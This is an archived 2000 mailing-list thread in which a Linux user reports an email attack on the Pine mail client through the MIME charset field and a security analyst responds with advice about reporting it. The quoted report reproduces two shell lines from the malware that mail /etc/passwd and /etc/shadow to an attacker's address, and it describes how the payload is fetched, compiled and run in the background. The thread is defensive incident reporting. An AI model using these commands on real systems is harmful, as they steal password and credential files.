Complete.Org: Mailing Lists: Archives: discussion: May 2000:
[aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file

[aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file

[Top] [All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index] [Thread Index]
To: <discussion@xxxxxxxxx>
Subject: [aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file attached! (fwd)
From: "Dale W Hodge" <dwh@xxxxxxxxxxxxxxxx>
Date: Thu, 18 May 2000 13:45:55 -0500
Reply-to: discussion@xxxxxxxxx

Here's the second.

-----Original Message-----
From: owner-linux-admin@xxxxxxxxxxxxxxxx
[mailto:owner-linux-admin@xxxxxxxxxxxxxxxx] On Behalf Of Michael H.
Sent: Tuesday, May 16, 2000 7:55 AM
To: Jim Roland
Cc: linux-net@xxxxxxxxxxxxxxxx; linux-admin@xxxxxxxxxxxxxxxx;
Subject: Re: URGENT!!!!!!! Pine hacking attack: DOS attack, log file
attached! (fwd)

On Tue, May 16, 2000 at 02:48:48AM -0500, Jim Roland wrote:

> I'm sure some of you might have been hit with something like this, but
> this is the first time that in my 3 years of using Pine, has Pine been
> used to attempt to hack into my system.  This is a little too scary, and a
> little too close to similar attacks against Microsoft email software.

        Pine has had a couple of attacks in the distant past.  I seem
to recall some Mime related attacks (MetaMail vulnerabilities).  Is your
Pine 3 years old or is it recent and you've been working with various
versions for over 3 years?

> For everyone's sake, I hope it was just me that was attacked, but it
> appears that the person who sent out the message used to attack, put
> addresses in the BCC field, which probably spammed several people.  If you
> receive a message with "DOS attack, log file attached!" and you're on Unix
> or Linux, DO NOT, I REPEAT, DO NOT OPEN the message.  I'm not speaking
> like the media press that says "do not open the message" when they really
> mean to say "do not open the attachment", this type of attack using *nix
> systems (Linux, etc) literally to start running a program while a message
> is being looked over for attachments via Pine.  If you open the message to
> view the headers or body, IT'S TOO LATE!

        Hmmm...  I haven't seen a copy of it.  Anyone got an untarnished copy
they can send me for analysis?  Seriously, I handle cybertoxins, and I don't
use Pine or Windows.  I use Mutt (and vi when I have to).  If someone
gets a copy of it, just "bounce" it to me without opening it, if you
are worried about it.  I can deal with it here.  I mean an unblemished,
unedited version.  What was appended below appears to just be a simple
meta-character attack against Mime (which can be quite effective).


> Like a good admin, I thought this was a real message, and wanted to find
> out what was going on.  I was too tired to be suspicious that the from and
> to address never contained anything from my domain name.  Unfortunately,
> Pine does not show the "To" address, and thinking it was sent to my "root"
> or one of the "*master" accounts (why the "+" does not show up in front of
> the message--I have admin accounts forwarded to my user-level account), I
> opened it.


> Let me preface this first (especially for you new to linux), with
> the phrase that all linux books and installation manuals tell you:
> NEVER, NEVER, NEVER use your admin account (root) to do ANY user functions
> on the system, including reading mail.  Newbies:  Don't be scared by this,
> Linux is a great system, and actually is more secure and (at the moment),
> immune to most viruses like the ILOVEYOU that floated around.

        This can never be repeated enough.  If you are always logged in
as root when using your system, you might as well be running DOS, you
have about that much security.


> Those who think Pine is immune to being attacked or being used to attack,
> are gravely mistaken.  (Pine is a command-line email program that, can't
> be used to run things like .vbs files, or other document viruses).

        As I said, there have been problems in the past.  One recent
one just last November (check Security Focus database).


> 1) Masquerading as an attachment (this apparently only works with
> pine--Microsoft mail programs would be immune to this and would see
> jibberish (MIME encoded b.s.) and a log file showing IP addresses that are
> not even part of their (or mine) network), the MIME field called "charset"
> was used to launch an attack against the system.

        The references to {IFS} (which is a shell variable which contains
the separator character set) make me think that it's a meta character
attack against external commands Pine is calling (MetaMail?  Does Pine
use MetaMail for decoding MIME attachments like elm or does it use an
internal MIME decoder like Mutt?)

> 2) The attack was simply to launch a text-based web browser (lynx), pull
> down the source code of a C++ program called "io" that froze my system
> (actually slowed it down).

        Anyone got a copy of that code they can send me?

> 3) The program (io), is downloaded, stored in /tmp/io, is compiled,
> and run.  All in the background, hiding the compiler (gcc) pipes to shell
> (sh or bash) from being seen by the ps command.  I did manage to kill the
> parent process (sh) and killed the attempt, but mail logs show it was too
> late (fortunately he did not get much from my system but "permission
> denied" messages).

> 4) The "io" program's purpose was to email my /etc/passwd and
> /etc/shadow files to an email account (bjern3@xxxxxxxxxxxxx), along with
> my hostname, IP address, etc.


> ** Step #4 is where the golden rule (Never use "root" to do ANY user
> functions), comes into play.


> The program's source code (for security reasons, and so that I don't send 
> to a potential cracker, I will only post the lines that do the actual
> stealing...I have no idea (yet) what the rest of the program does):

        You can just cut that nonsense now.  The only people who you
are denying access to the source are the people who need it to analyse
it.  That means that ONLY the potential crackers will have it.  You
aren't denying it to them.  They already have good ways to "spread the
word" and they don't learn their tricks from you or me.  You make MY job
more difficult, not theirs.

        Has this been reported to incidents@xxxxxxxxxxxxxxxxx or
possibly to bugtraq@xxxxxxxxxxxxxxxxx?

> mail -s hhp-pine000 bjern3@xxxxxxxxxxxxx 2>/dev/null < /etc/passwd
> echo "`hostname -i` - `id` - `cat /etc/shadow 2>&1`" | mail -s hhp-pine 
> bjern3@xxxxxxxxxxxxx 2>/dev/null

> Lastly, below is the evil mail message.  I've snipped out the MIME encoded
> data, which doesn't appear to be a real attachment, however, the "evil" is
> contained in a [disabled] "charset=" field.  I changed the Pipe symbols to
> an underscore (_) so that they will not harm your system.

        Yeah...  Meta character attack.  Trick is as old as the hills.
Pine SHOULD be immune, if your Pine is up to date.  If it's still
vulnerable to these ancient tricks, someone needs to be seriously slapped.

> The file actually contains 2 attachments as far as Pine is concerned.  The
> 2nd does the damage, the 1st is to provide a "front" if it's a
> non-Pine mail client.  The "front" contains a log snippet, maybe real,
> maybe not. To prevent this message from being longer than necessary, I
> will not include it, just the MIME headers to filter out (maybe with
> procmail, or sendmail)--look for "charset" as noted below with the hash
> (#) in front, and filter out the content of that field, so your mail users
> do not get hit with this attack.  The "attached log file" is merely a list
> of ip-deny messages via syslog.  The IPs in the log appear to be fake or
> dial-up IPs.

> Good luck.
> JR

        [Modified hostile message deleted]

        Definitely, this needs to be brought up on the incidents mailing
list.  If this is a recent version of Pine, it needs to also go to the
Pine developers and to BugTraq.  Check for any recent
Pine vulnerabilities.  I show Pine 4.10 on RedHat 6.1 and Pine 4.21 on
RedHat 6.2 and Pine 4.10 was a recommended update to RedHat 5.2.

        If it's Pine prior to 4.21, it could be this problem:

        Pine Environment Variable Expansion in URLS Vulnerability

        This dates back to November of last year.

        It sounds similar but not quite an exact match to what's
described in that entry.  They could be related.  If you have got
Pine 4.21, then this may be something new and definitely take it to

 Michael H. Warfield    |  (770) 985-6132   |  mhw@xxxxxxxxxxxx
  (The Mad Wizard)      |  (770) 331-2437   |
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!

 to unsubscribe email "unsubscribe linux-admin" to majordomo@xxxxxxxxxxxxxxxx
 See the linux-admin FAQ:

-- This is the discussion@xxxxxxxxx list.  To unsubscribe,

[Prev in Thread] Current Thread [Next in Thread]
  • [aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file attached! (fwd), Dale W Hodge <=